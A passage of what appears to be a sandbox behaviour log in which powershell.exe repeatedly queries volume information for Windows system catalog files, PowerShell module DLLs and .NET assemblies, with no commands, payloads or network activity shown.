                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
